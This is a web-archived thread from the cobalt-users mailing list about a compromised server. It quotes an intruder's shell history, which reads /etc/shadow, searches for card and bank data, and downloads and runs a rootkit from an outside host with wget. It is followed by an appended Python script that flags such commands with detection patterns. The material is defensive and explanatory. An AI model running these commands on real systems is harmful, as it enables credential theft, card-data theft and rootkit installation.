
Re: [cobalt-users] CHkrootkit output



> > Subject: Re: [cobalt-users] CHkrootkit output
> >
> >
> > > >
> > > > I believe that machine has been hacked. Is cron doing weird stuff? Other
> > > > processes like devine?
> > >
> > >
> > > And your conclusion is based on ??
> > Seeing it first hand. Some notes..
> > Cron will work. Turning it off is the problem, a process called devine
> > will popup usually once a day and stay running. It's nasty. Believe it can
> > sniff the username and pw of clients
> > isp logins besides the system passwords. They used a wget from the server
> > to download it from a free isp in europe.
> > They entered through a script called phpnuke one time and cgi (forgot the
> > name) on another raq4. Other than those
> > notes it ran fine. It also searches files for cc numbers, email addresses
> > and any ftp user connections from any scripts.
> > Once I saw that, it went offline. A reboot usually starts the ball rolling
> > if I remember right,
> > then clients can be locked out of shell and ftp along with the admin. mods
> > to the hosts.deny and allow files.
> >
> > > Cron is fully operational and normal.
> > >
> > > No strange processes
> >

> This is the .bash_history detail and where it came from..... Note: I blocked
> the ip before it could send.
> [root /]# cat .bash_history
> id
> cat /etc/shadow
> mkdir /usr/lib/lib.a
> ps x
> cd /usr/lib/lib.a
> locate order.txt
> locate visa
> cd /home/sites/home/
> ls
> cd passwords
> ls
> cd ..
> cd web
> ls
> cd cgi-bin
> ls
> cd SSL
> ls
> cd ..
> cd hosting
> ls
> locate data.txt
> cat /home/sites/site10/web/scripts/mb/data.txt
> cat /home/sites/home/web/UserWeather/dat/data.txt
> cat /home/sites/home/web/UserWeather/counter/data.txt
> locate cvv
> cd /home/sites/site4/web/cgi-bin/order/
> ls
> cd data
> ls
> cd /home/sites/site12/web/cgi-bin/WWE/
> ls
> cat apwf.txt
> cd ..
> ls
> cd usa
> cd USA
> ls
> cd ..
> cd recluse
> ls
> locate bank
> cat /etc/hosts
> cd /usr/lib/lib.a
> wget it.geocities.com/sballo1984/skr.tar.gz
> tar zxvf skr.tar.gz
> cd skr
> ./setup dio


> >   David Hahn
> >   PageKeeper Service
> >   1512 Deborah Road #102
> >   Rio Rancho, New Mexico 87124 US
> >   505-892-8723
> >   http://www.pagekeeperservice.com
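The shell history quoted in the thread is a clean specimen of post-compromise reconnaissance: reading /etc/shadow, hunting for card data with locate, staging a directory under /usr/lib, then a wget / tar / ./setup chain. As an added defender-side illustration (not code from the thread or the cobalt-users list), here is a small Python triage routine that flags such lines by category and detects the download-extract-execute sequence. The sample history and the indicator list are constructed for this example, and the download host is a placeholder.

```python
import re

# Constructed sample modelled on the history quoted in the thread (not the
# thread's data verbatim; the download host is a placeholder).
SAMPLE_HISTORY = """id
cat /etc/shadow
mkdir /usr/lib/lib.a
locate order.txt
locate visa
locate cvv
cat /etc/hosts
wget download-host.invalid/skr.tar.gz
tar zxvf skr.tar.gz
cd skr
./setup dio
"""

# Indicator patterns are an assumption for this example: they encode the
# behaviour the thread describes, not an exhaustive list of bad commands.
INDICATORS = [
    ("credential_access", re.compile(r"^cat\s+/etc/(shadow|passwd)\b")),
    ("card_data_hunting", re.compile(r"^locate\s+(visa|cvv|bank|order\.txt|data\.txt)\b", re.I)),
    ("hidden_staging_dir", re.compile(r"^mkdir\s+/usr/lib/\S+")),
    ("remote_download", re.compile(r"^(wget|curl)\s+\S+")),
    ("archive_extract", re.compile(r"^tar\s+\S*x\S*\s+\S+")),
    ("local_execute", re.compile(r"^\./\S+")),
]

def triage_history(text):
    """Return (line_number, category, line) for each history line hitting an indicator."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), 1):
        line = line.strip()
        for category, pattern in INDICATORS:
            if pattern.search(line):
                findings.append((lineno, category, line))
    return findings

def download_execute_chain(findings):
    """True when a download, an extraction and a local execution appear in that
    order, i.e. the wget / tar zxvf / ./setup sequence from the thread."""
    want = ["remote_download", "archive_extract", "local_execute"]
    pos = 0
    for _, category, _ in findings:
        if category == want[pos]:
            pos += 1
            if pos == len(want):
                return True
    return False
```

Run it over a copied .bash_history (or a shell audit log) rather than on the live root shell of a box you suspect is compromised, since the history file itself is attacker-controlled and may have been truncated or cleared.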